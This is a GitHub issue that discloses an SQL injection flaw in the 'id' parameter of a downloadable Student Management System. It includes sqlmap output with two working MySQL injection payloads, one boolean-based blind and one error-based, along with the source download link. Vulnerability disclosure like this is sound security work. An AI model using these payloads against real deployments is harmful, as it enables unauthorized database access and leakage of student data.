Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Sql injection exists for Student Management System page ID #4

Open
beicheng-maker opened this issue Aug 17, 2022 · 0 comments
Open

Comments

@beicheng-maker
Copy link
Owner

Sql injection vulnerability exists in the page ID code parameter of Student Management System, which can be exploited by attackers to obtain sensitive information and cause data leakage.
image
Sqlmap attack
image
Payload

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: q=singleblog&id=2019009' RLIKE (SELECT (CASE WHEN (3975=3975) THEN 2019009 ELSE 0x28 END))-- APsb

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: q=singleblog&id=2019009' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(6331=6331,1))),0x7170717071),6331)-- suyx
---

Downloadsource:

https://www.sourcecodester.com/sites/default/files/download/oretnom23/studentmanagement.zip
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant